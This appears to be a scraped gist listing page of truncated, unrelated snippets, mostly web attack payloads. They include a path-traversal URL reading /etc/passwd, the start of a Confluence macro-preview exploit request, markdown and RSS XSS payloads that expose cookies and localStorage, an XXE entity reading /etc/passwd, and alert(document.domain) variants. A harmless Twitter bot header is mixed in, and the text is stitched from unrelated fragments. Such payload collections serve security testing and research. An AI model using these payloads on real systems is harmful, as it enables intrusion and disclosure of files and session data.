This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
http://example.com:8081/label/default/master/..%252F..%252F..%252F../etc/passwd | |
ref: https://twitter.com/chybeta/status/1118370858974760963?s=19 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<pre>phpinfo();</pre> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
POST /rest/tinymce/1/macro/preview HTTP/1.1 | |
Host: xxx.com | |
Connection: close | |
Accept-Encoding: gzip, deflate | |
Accept: text/html, */*; q=0.01 | |
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 | |
X-Atlassian-Token: no-check | |
Content-Type: application/json; charset=utf-8 | |
Referer: https://xxxx.com/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23& | |
Content-Length: 168 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[Basic](javascript:alert('Basic')) | |
[Local Storage](javascript:alert(JSON.stringify(localStorage))) | |
[CaseInsensitive](JaVaScRiPt:alert('CaseInsensitive')) | |
[URL](javascript://www.google.com%0Aalert('URL')) | |
[In Quotes]('javascript:alert("InQuotes")') | |
![Escape SRC - onload](https://www.example.com/image.png"onload="alert('ImageOnLoad')) | |
![Escape SRC - onerror]("onerror="alert('ImageOnError')) | |
[XSS](javascript:prompt(document.cookie)) | |
[XSS](j a v a s c r i p t:prompt(document.cookie)) | |
[XSS](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<? | |
// | |
// AUTO KEYWORD-BASED FOLLOWER CURATION BOT (by @levelsio) | |
// | |
// File: twitterFollowerCuratorBot.php | |
// | |
// Created: May 2021 | |
// License: MIT | |
// |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="UTF-8"?> | |
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:cc="http://web.resource.org/cc/" xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" xmlns:media="http://search.yahoo.com/mrss/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> | |
<channel> | |
<atom:link href="http://dataskeptic.libsyn.com/rss" rel="self" type="application/rss+xml"/> | |
<title>Data <![CDATA[<]]>script<![CDATA[>]]>alert(0)<![CDATA[<]]>/script<![CDATA[>]]></title> | |
<pubDate>Fri, 15 Jan 2016 15:00:00 +0000</pubDate> | |
<lastBuildDate>Fri, 15 Jan 2016 15:08:58 +0000</lastBuildDate> | |
<generator>Libsyn <![CDATA[<]]>script<![CDATA[>]]>alert(1)<![CDATA[<]]>/script<![CDATA[>]]> 2.0</generator> | |
<link>http://dataskeptic.com</link> | |
<language>en</language> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="UTF-8"?> | |
<!DOCTYPE xxe [ | |
<!ENTITY xxe SYSTEM | |
"file:///etc/passwd" > | |
]> | |
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:cc="http://web.resource.org/cc/" xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" xmlns:media="http://search.yahoo.com/mrss/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> | |
<channel> | |
<atom:link href="http://dataskeptic.libsyn.com/rss" rel="self" type="application/rss+xml"/> | |
<title>&xxe</title> | |
<pubDate>Fri, 15 Jan 2016 15:00:00 +0000</pubDate> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
app.alert("XSS") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Open terminal and install asar node module globally | |
$ npm install -g asar | |
# Go into the app’s directory, in our case it’s Slack | |
$ cd /Applications/Slack.app/Contents/Resources | |
# Create a directory to paste the content of app |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// How many ways can you alert(document.domain)? | |
// Comment with more ways and I'll add them :) | |
// I already know about the JSFuck way, but it's too long to add (: | |
// Direct invocation | |
alert(document.domain); | |
(alert)(document.domain); | |
al\u0065rt(document.domain); | |
al\u{65}rt(document.domain); | |
window['alert'](document.domain); |
OlderNewer